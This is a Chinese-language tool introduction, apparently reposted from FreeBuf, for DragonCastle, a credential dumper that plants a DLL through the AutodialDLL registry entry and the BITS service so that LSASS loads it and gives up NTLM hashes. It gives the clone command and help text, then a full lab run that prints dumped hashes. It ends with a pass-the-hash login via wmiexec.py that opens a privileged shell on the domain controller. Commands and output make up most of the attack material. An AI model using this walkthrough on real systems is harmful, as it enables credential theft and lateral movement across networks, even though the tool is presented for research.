如何使用DragonCastle从LSASS进程中提取NTLM哈希

关于DragonCastle

DragonCastle是一款结合了AutodialDLL横向渗透技术和SSP的安全工具，该工具旨在帮助广大研究人员从LSASS进程中提取NTLM哈希。

该工具会向目标设备中上传一个DLL，然后它会启用远程注册表功能以修改AutodialDLL条目并启动/重启BITS服务。Svchosts将负责加载我们上传的DLL，再次将AutodialDLL设置为默认值，并执行RPC请求以强制LSASS加载与安全支持提供程序相同的DLL。一旦LSASS加载了DLL，它就会在进程内存中进行搜索，以提取NTLM哈希和密钥/IV。

支持的操作系统版本

操作系统版本	支持状态
Windows 10 version 21H2
Windows 10 version 21H1	支持
Windows 10 version 20H2	支持
Windows 10 version 20H1 (2004)	支持
Windows 10 version 1909	支持
Windows 10 version 1903	支持
Windows 10 version 1809	支持
Windows 10 version 1803	支持
Windows 10 version 1709	支持
Windows 10 version 1703	支持
Windows 10 version 1607	支持
Windows 10 version 1511
Windows 10 version 1507
Windows 8
Windows 7

工具下载

该工具的运行需要使用到Python 3环境，因此我们首先需要在本地设备上安装并配置好Python 3环境。广大研究人员可以使用下列命令将该项目源码克隆至本地：

git clone https://github.com/mdsecactivebreach/DragonCastle.git

工具使用帮助

psyconauta@insulanova:~/Research/dragoncastle|⇒  python3 dragoncastle.py -h                                                                                                                                            

DragonCastle - @TheXC3LL

 

 

usage: dragoncastle.py [-h] [-u USERNAME] [-p PASSWORD] [-d DOMAIN] [-hashes [LMHASH]:NTHASH] [-no-pass] [-k] [-dc-ip ip address] [-target-ip ip address] [-local-dll dll to plant] [-remote-dll dll location]

 

DragonCastle - A credential dumper (@TheXC3LL)

 

optional arguments:

  -h, --help             显示工具帮助信息和退出

  -u USERNAME, --username USERNAME    有效用户名

  -p PASSWORD, --password PASSWORD    有效密码

  -d DOMAIN, --domain DOMAIN    有效域名

  -hashes [LMHASH]:NTHASH      NT/LM 哈希

  -no-pass              不询问密码

  -k                    使用Kerberos身份验证

  -dc-ip ip address     域控制器的IP地址

  -target-ip ip address   目标设备的IP地址

  -local-dll dll to plant    待上传的DLL本地文件路径

  -remote-dll dll location   更新AutodialDLL 注册表项值的远程路径

工具使用样例

Windows服务器地址为192.168.56.20，域控制器地址为192.168.56.10：

psyconauta@insulanova:~/Research/dragoncastle|⇒  python3 dragoncastle.py -u vagrant -p 'vagrant' -d WINTERFELL -target-ip 192.168.56.20 -remote-dll "c:\dump.dll" -local-dll DragonCastle.dll                          

DragonCastle - @TheXC3LL

 

 

[+] Connecting to 192.168.56.20

[+] Uploading DragonCastle.dll to c:\dump.dll

[+] Checking Remote Registry service status...

[+] Service is down!

[+] Starting Remote Registry service...

[+] Connecting to 192.168.56.20

[+] Updating AutodialDLL value

[+] Stopping Remote Registry Service

[+] Checking BITS service status...

[+] Service is down!

[+] Starting BITS service

[+] Downloading creds

[+] Deleting credential file

[+] Parsing creds:

 

============

----

User: vagrant

Domain: WINTERFELL

----

User: vagrant

Domain: WINTERFELL

----

User: eddard.stark

Domain: SEVENKINGDOMS

NTLM: d977b98c6c9282c5c478be1d97b237b8

----

User: eddard.stark

Domain: SEVENKINGDOMS

NTLM: d977b98c6c9282c5c478be1d97b237b8

----

User: vagrant

Domain: WINTERFELL

NTLM: e02bc503339d51f71d913c245d35b50b

----

User: DWM-1

Domain: Window Manager

NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590

----

User: DWM-1

Domain: Window Manager

NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590

----

User: WINTERFELL$

Domain: SEVENKINGDOMS

NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590

----

User: UMFD-0

Domain: Font Driver Host

NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590

----

User:

Domain:

NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590

----

User:

Domain:

 

============

[+] Deleting DLL

 

[^] Have a nice day!

psyconauta@insulanova:~/Research/dragoncastle|⇒  wmiexec.py -hashes :d977b98c6c9282c5c478be1d97b237b8 SEVENKINGDOMS/eddard.stark@192.168.56.10          

Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

 

[*] SMBv3.0 dialect used

[!] Launching semi-interactive shell - Careful what you execute

[!] Press help for extra shell commands

C:\>whoami

sevenkingdoms\eddard.stark

 

C:\>whoami /priv

 

PRIVILEGES INFORMATION

----------------------

 

Privilege Name                            Description                                                        State  

========================================= ================================================================== =======

SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Enabled

SeMachineAccountPrivilege                 Add workstations to domain                                         Enabled

SeSecurityPrivilege                       Manage auditing and security log                                   Enabled

SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Enabled

SeLoadDriverPrivilege                     Load and unload device drivers                                     Enabled

SeSystemProfilePrivilege                  Profile system performance                                         Enabled

SeSystemtimePrivilege                     Change the system time                                             Enabled

SeProfileSingleProcessPrivilege           Profile single process                                             Enabled

SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Enabled

SeCreatePagefilePrivilege                 Create a pagefile                                                  Enabled

SeBackupPrivilege                         Back up files and directories                                      Enabled

SeRestorePrivilege                        Restore files and directories                                      Enabled

SeShutdownPrivilege                       Shut down the system                                               Enabled

SeDebugPrivilege                          Debug programs                                                     Enabled

SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Enabled

SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled

SeRemoteShutdownPrivilege                 Force shutdown from a remote system                                Enabled

SeUndockPrivilege                         Remove computer from docking station                               Enabled

SeEnableDelegationPrivilege               Enable computer and user accounts to be trusted for delegation     Enabled

SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Enabled

SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled

SeCreateGlobalPrivilege                   Create global objects                                              Enabled

SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Enabled

SeTimeZonePrivilege                       Change the time zone                                               Enabled

SeCreateSymbolicLinkPrivilege             Create symbolic links                                              Enabled

SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled

 

C:\>

项目地址

DragonCastle：【GitHub传送门】

参考资料

https://decoded.avast.io/luigicamastra/operation-dragon-castling-apt-group-targeting-betting-companies/

https://www.hexacorn.com/blog/2015/01/13/beyond-good-ol-run-key-part-24/

https://adepts.of0x.cc/physical-graffiti-lsass/

https://blog.xpnsec.com/exploring-mimikatz-part-2/

https://twitter.com/TheXC3LL

本文作者：Alpha_h4ck

转载自FreeBuf.COM